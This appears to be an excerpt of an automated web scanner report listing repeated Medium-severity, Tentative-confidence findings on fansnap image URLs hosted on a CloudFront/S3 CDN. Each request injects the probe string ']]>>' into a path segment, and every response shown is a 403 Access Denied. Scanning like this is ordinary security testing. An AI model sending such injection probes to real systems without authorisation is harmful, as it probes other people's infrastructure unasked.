8.160. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3942FA9D8FC44ADB
x-amz-id-2: VlTh353z771ubD9S5HTcRPWJgENq38MD1H62Py42RLn33wABfZrTUMX05sCGqmHj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 588a16edcdb2a4762bb3de9d22a9b4ffaf4c952629eaf5eac715aea1e33262e42b3b5ea225de9cc0
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3942FA9D8FC44ADB</RequestId><HostId>VlTh353z771ubD9S5HTcRPWJgENq38MD1H62Py42RLn33wABfZ
...[SNIP]...

8.161. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0C9D319587600023
x-amz-id-2: eG8TJdB5KyFYmkK7ww1lbikpy8Q8eFxF5/3/XThqoQiQD50Vbk9veBYs6wf1qHfG
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:27 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c5db54f39efce5f53edf6e5cce3eb18391c535bd5f784695acd5aa021f33062027a0d3511310e1b9
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0C9D319587600023</RequestId><HostId>eG8TJdB5KyFYmkK7ww1lbikpy8Q8eFxF5/3/XThqoQiQD50Vbk
...[SNIP]...

8.162. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A4E562E4C07FF040
x-amz-id-2: 101WhJGv8nJP9i38RpwTUrc3+UZ0mYjY351bqmFuZ1MjsvrIYKAg0AUnpe6eysZp
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ca33f5bab14fe570918a2923f69d769061549eef7a37b59adec7c96b46d194b3725fc5c33f9435dc
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A4E562E4C07FF040</RequestId><HostId>101WhJGv8nJP9i38RpwTUrc3+UZ0mYjY351bqmFuZ1MjsvrIYK
...[SNIP]...

8.163. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 11BEF973323AEFE2
x-amz-id-2: DFRrTdYP+HZyyyyU9ejWEEqZhPbzaZPuP37s6FtB0grIbGNgg1xSIjMIXKqVfcEh
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 69299366edc023beea36cd88f71201c1b3ad2780df58a7515a7fbd4b0dc5a2c8120eda8fe26a5354
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>11BEF973323AEFE2</RequestId><HostId>DFRrTdYP+HZyyyyU9ejWEEqZhPbzaZPuP37s6FtB0grIbGNgg1
...[SNIP]...

8.164. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 702A9A93AFEA7302
x-amz-id-2: eszqLEAoyiv9UjpAdtnfaq4XM6XmpZ5IK4+EJS/leicejDFX6+rN0Ds4e/dwzOie
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 014f8022f642692b4c8d05ce8ab252f39ac11b97ec2b7ea4b18a9ef8b746184e46949fd1d4e05f96
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>702A9A93AFEA7302</RequestId><HostId>eszqLEAoyiv9UjpAdtnfaq4XM6XmpZ5IK4+EJS/leicejDFX6+
...[SNIP]...

8.165. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AD400BD090E77D6A
x-amz-id-2: 7ROlnQPie528jHIsIR/ZdoMpIQwFJzN5HMHeCLqJEkXNuLmdClyqm3L+VEs31vc9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d76abba3561071c216a0b5d963ad46d631f76429679ad4ce59207abd110cf26f592451eb0c8be4dd
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AD400BD090E77D6A</RequestId><HostId>7ROlnQPie528jHIsIR/ZdoMpIQwFJzN5HMHeCLqJEkXNuLmdCl
...[SNIP]...

8.166. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C0C99A08ECB813B2
x-amz-id-2: L2nKgc0FzmayxGyqwoIap+megwuJmdxl81IItInwmhEbTh1cX5MN6KuyqjYarrFD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 458d16d38bd018065b65af5c66bb9bb1c2ecbf245e7b44c5f636fd31702f5f7a2b9d87983662af3f
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C0C99A08ECB813B2</RequestId><HostId>L2nKgc0FzmayxGyqwoIap+megwuJmdxl81IItInwmhEbTh1cX5
...[SNIP]...

8.167. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 39E9ED6266877FC1
x-amz-id-2: fRwtA+/YkpPo8Ap6V9M7jr72tGdaljSbAnInv21Qr5DxWqn/KzSGMrPHjl0QJktR
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bc9cbb205c53d54c9d826de25823f4dbc0dc8f2d17ccdc245221164b049831adc265e191d039ba9f
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>39E9ED6266877FC1</RequestId><HostId>fRwtA+/YkpPo8Ap6V9M7jr72tGdaljSbAnInv21Qr5DxWqn/Kz
...[SNIP]...

8.168. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B04858BD57A49A40
x-amz-id-2: s8Dl3oNWpV4bkAVFUqxkZLqiU0AQAu5JaZHCgW9uR+AEWaMHITze+DPNVaJTb4J9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7a7927f264a2cf486d7b7cc152f6e894ef255e0a7e624462fec772d63af2677e1f774a7799e8a088
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B04858BD57A49A40</RequestId><HostId>s8Dl3oNWpV4bkAVFUqxkZLqiU0AQAu5JaZHCgW9uR+AEWaMHIT
...[SNIP]...

8.169. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1B198A299BC7E670
x-amz-id-2: u7KxoN/sXgEBwhpyvz2kUs6eRGbjD8EW5LrkY3gzzkQaKvfVoQXmmF+txaUnoGsj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:03 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: cdfdfadf40ec9a0823cca9d154d7e4fe89d2c8826ffe54c93f0b728784fbc542f95ee98a77c6d0eb
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1B198A299BC7E670</RequestId><HostId>u7KxoN/sXgEBwhpyvz2kUs6eRGbjD8EW5LrkY3gzzkQaKvfVoQ
...[SNIP]...

8.170. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A8469E087FDA95BE
x-amz-id-2: CO2PxPtvD32w2asorRyDcm/6pHUggyix0ZRuNGC6CHxYBJMQhOlEew57bSclSH5m
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ead64f90e8cb9d7ab44654b99c8d870454243a79c119d1000d69268bdcd09106b474a23a39e679b0
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A8469E087FDA95BE</RequestId><HostId>CO2PxPtvD32w2asorRyDcm/6pHUggyix0ZRuNGC6CHxYBJMQhO
...[SNIP]...

8.171. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C0B451D1D90E1883
x-amz-id-2: Yjy4vAh016+Pt+zw5RD5h/5rlmx30Or1RXo9BQUpQCZhZ/He/bIVIEsKOeX+b52E
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9818755ba6a3a7bf5e81f7e3374ac8c736aac95e616964926261d4b9b376c922f3460494416c4d66
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C0B451D1D90E1883</RequestId><HostId>Yjy4vAh016+Pt+zw5RD5h/5rlmx30Or1RXo9BQUpQCZhZ/He/b
...[SNIP]...

8.172. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 493A8169820B1D3F
x-amz-id-2: GZUFVgZ2gKZ8rPrFJn/WMJzJslywMJX7VzKHw0YPO9qW8DdxHxCFdLAvjSdTuHh1
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 56cd8d967d4777b5781e426f566ee55331b1077b8f75759f8d37162f4df123bc6293c9f4e84d90eb
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>493A8169820B1D3F</RequestId><HostId>GZUFVgZ2gKZ8rPrFJn/WMJzJslywMJX7VzKHw0YPO9qW8DdxHx
...[SNIP]...

8.173. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C4C7A827C24575C9
x-amz-id-2: iSZwxCAJ0rzkeO6o4a7JULu9uDGv/lSkCxiDAqU71EU5b7bx9nzGlmivbRgEnu8m
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 55085d7f0c74b088f3fb35e63961140829d5e20a135e30a6e86d82398cbb250f779914a014cf4dda
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C4C7A827C24575C9</RequestId><HostId>iSZwxCAJ0rzkeO6o4a7JULu9uDGv/lSkCxiDAqU71EU5b7bx9n
...[SNIP]...

8.174. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
